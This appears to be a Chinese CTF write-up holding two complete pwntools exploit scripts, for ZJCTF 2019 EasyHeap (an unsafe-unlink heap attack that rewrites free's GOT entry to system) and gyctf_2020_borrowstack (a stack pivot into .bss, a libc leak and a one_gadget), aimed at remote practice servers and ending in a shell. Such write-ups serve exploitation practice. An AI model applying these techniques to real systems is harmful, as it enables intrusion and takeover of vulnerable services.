[ZJCTF 2019]EasyHeap

这里有几个要点。第一个(对应下面 gyctf_2020_borrowstack 里的 p64(ret)*28):栈迁移到 bss 之后,先用一串 ret 把 rsp 抬高(28 个 qword,共 0xE0 字节),再去调用 puts;这样被调用函数自己的栈帧向低地址增长时落在已经执行过的 ret 滑板上,而不会覆盖 bss 起始地址以下程序原有的数据,exp 的 ROP 链也就不会被破坏。

第二个就是

from pwn import *

#p=process('./pwn')
# Remote-only run: the local process() line above is kept for debugging.
# NOTE(review): debug logging echoes every byte sent and received, i.e. the
# full payloads and the interactive shell session, to the terminal.
context.log_level = 'debug'
p = remote('node5.buuoj.cn', 27294)

# Target binary and the libc it was shipped with (glibc 2.23).
elf = ELF('./pwn')
libc = ELF('./libc-2.23.so')

# Fixed addresses read from the binary: the GOT slots the exploit rewrites
# and the PLT stubs it jumps through (the binary imports system itself).
free_got, puts_got = elf.got['free'], elf.got['puts']
puts_plt = elf.plt['puts'] + 0x16   # not used below; the +0x16 offset is unexplained here
system_plt = elf.plt['system']

def add(size, content):
    """Menu option 1: allocate `size` bytes and fill them with `content`.

    Prompts are matched as bytes; the choice and size go out as ASCII
    decimal text.  Blocks until the service answers 'SuccessFul'.
    """
    p.sendlineafter(b'Your choice :', b'1')
    p.sendlineafter(b'Size of Heap : ', str(size).encode())
    p.sendlineafter(b'Content of heap:', content)
    p.recvuntil(b'SuccessFul')

def edit(idx, content):
    """Menu option 2: rewrite the chunk at index `idx` with `content`.

    The size reported to the service is len(content), so a payload longer
    than the chunk's original allocation is written past its end; the
    unlink stage below depends on exactly that overflow.  Waits for
    'Done !' before returning.
    """
    p.sendlineafter(b'Your choice :', b'2')
    p.sendlineafter(b'Index :', str(idx).encode())
    p.sendlineafter(b'Size of Heap : ', str(len(content)).encode())
    p.sendlineafter(b'Content of heap :', content)
    p.recvuntil(b'Done !')

def delete(idx):
    """Menu option 3: free the chunk at index `idx`.

    The 'Done !' wait is left commented out -- presumably because the final
    delete(3) call hands control to system() and the prompt never arrives;
    waiting for it there would hang the script.
    """
    p.sendlineafter(b'Your choice :', b'3')
    p.sendlineafter(b'Index :', str(idx).encode())
    #p.recvuntil(b'Done !')

# Address the exploit treats as the program's chunk-pointer table
# (entry i at bss + 8*i, judging by the writes below).
# TODO confirm against the binary's .bss symbols.
bss=0x6020E0

#gdb.attach(p)
# Chunks 0 and 1: 0x80-byte requests, i.e. 0x90-byte chunks, above the
# default fastbin limit, so freeing chunk 1 goes through consolidation.
add(0x80,b'aaaa')
add(0x80,b'bbbb')

# Chunks 2 and 3 follow chunk 1; chunk 3 carries the string that the final
# free() ends up handing to system().
add(0x90,b'cccc')
add(0x90,b'/bin/sh\x00')
# Unsafe-unlink setup, written at the start of chunk 0's user data:
#   fake prev_size = 0, fake size = 0x81 (0x80 | PREV_INUSE)
#   fd = bss-0x18, bk = bss-0x10 -> fd->bk and bk->fd both resolve to
#   heaparray[0], which really does point here, so glibc 2.23's
#   "corrupted double-linked list" check passes.
#   0x60 bytes of filler brings the total to 0x80, the fake chunk's size.
payload=p64(0)+p64(0x81)+p64(bss-0x18)+p64(bss-0x10)+b'M'*(0x80-0x20)
# The next 0x10 bytes spill into chunk 1's header (edit() reports
# len(content) = 0x90 as the size, 0x10 more than chunk 0 was allocated
# for): prev_size = 0x80 points back at the fake chunk, size = 0x90 with
# PREV_INUSE cleared makes chunk 1 look like it follows a free chunk.
payload+=p64(0x80)+p64(0x90)

edit(0,payload)
# Leftover interactive breakpoint: blocks here until Enter is pressed,
# even in this remote-only configuration.
pause()
# free(chunk 1): PREV_INUSE is clear, so glibc consolidates backward and
# unlinks the fake chunk.  unlink's last write (bk->fd = fd) leaves
# heaparray[0] = bss-0x18.
delete(1)

# Writing "through" heaparray[0] now starts at bss-0x18: three zero qwords
# cover bss-0x18..bss-0x08, then free@got lands in heaparray[0] and
# puts@got in heaparray[1].
payload2=p64(0)*3
payload2+=p64(free_got)+p64(puts_got)

edit(0,payload2)
# heaparray[0] == free@got, so this edit overwrites free's GOT slot with
# system@plt.  No libc leak is needed: the binary imports system itself.
payload1=p64(system_plt)
edit(0,payload1)
# free(heaparray[3]) is now system("/bin/sh").
delete(3)
# Abandoned leak-based variant (puts@got -> libc base -> system).  This is a
# bare string expression, not a comment -- dead code that could be removed.
'''
leak=u64(p.recvuntil('\x7f')[-6:]+b'\x00\x00')

print(hex(leak))
libc_addr=leak-libc.sym['puts']

system=libc_addr+libc.sym['system']

payload=p64(system)

edit(0,payload)

delete(3)
'''

p.interactive()

gyctf_2020_borrowstack

from pwn import *
from LibcSearcher import *
#p=process('./pwn')
# Remote-only run; the local process() line above is kept for debugging.
p = remote('node5.buuoj.cn', 25450)
elf = ELF('./pwn')
# NOTE(review): debug logging echoes every byte on the wire, payloads and
# shell session included.
context.log_level = 'debug'

# Gadgets and addresses hard-coded from the binary (the script assumes the
# binary is not position-independent).
leave_ret = 0x400699            # leave ; ret -- moves rsp to the forged rbp
pop_rdi = 0x0000000000400703    # pop rdi ; ret
bss = 0x601080                  # writable area used as the "borrowed" stack
ret = 0x4004c9                  # plain ret, repeated as a sled

# The shipped libc is used for rebasing; LibcSearcher is imported at the
# top of the file but never used.
libc = ELF('./libc-2.23.so')

# libc-relative offset, rebased once the puts leak gives libc_base.
# NOTE(review): presumably a one_gadget address for this glibc 2.23 build;
# such gadgets carry register/stack constraints -- confirm with the tool.
shell = 0x4526a

main = elf.sym["main"]
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
#gdb.attach(p)
pause()   # leftover interactive breakpoint: blocks until Enter is pressed

# Stage 1: overflow the 0x60-byte buffer, forge saved rbp = bss and return
# into `leave ; ret`, so execution continues with rsp inside .bss.
pivot = b'a' * 0x60 + p64(bss) + p64(leave_ret)
p.send(pivot)

# Stage 2: the chain that the second send places at bss.  `leave` pops the
# first qword into rbp; the remaining 27 are executed as ret, so rsp climbs
# from bss to bss+0xE0 before puts runs.  The page's note: this keeps puts'
# own (downward-growing) frames on the used-up sled instead of on the data
# below bss.  Then puts(puts_got) leaks libc and main is re-entered.
ret_sled = p64(ret) * 28
rop_chain = b''.join(p64(g) for g in (pop_rdi, puts_got, puts_plt, main))
p.send(ret_sled + rop_chain)

# The leaked address is the first 6 bytes after the banner.
p.recvuntil(b'Done!You can check and use your borrow stack now!\n')
leak_addr = u64(p.recv(6) + b'\x00\x00')
print(hex(leak_addr))

libc_base = leak_addr - libc.sym['puts']
shell += libc_base   # rebase the libc-relative gadget offset

# Stage 3: main runs again; overwrite the return address directly
# (0x60 buffer + 8 bytes of saved rbp) with the rebased gadget.
final_stage = b'a' * 0x68 + p64(shell)
p.sendline(final_stage)

p.interactive()
p.interactive()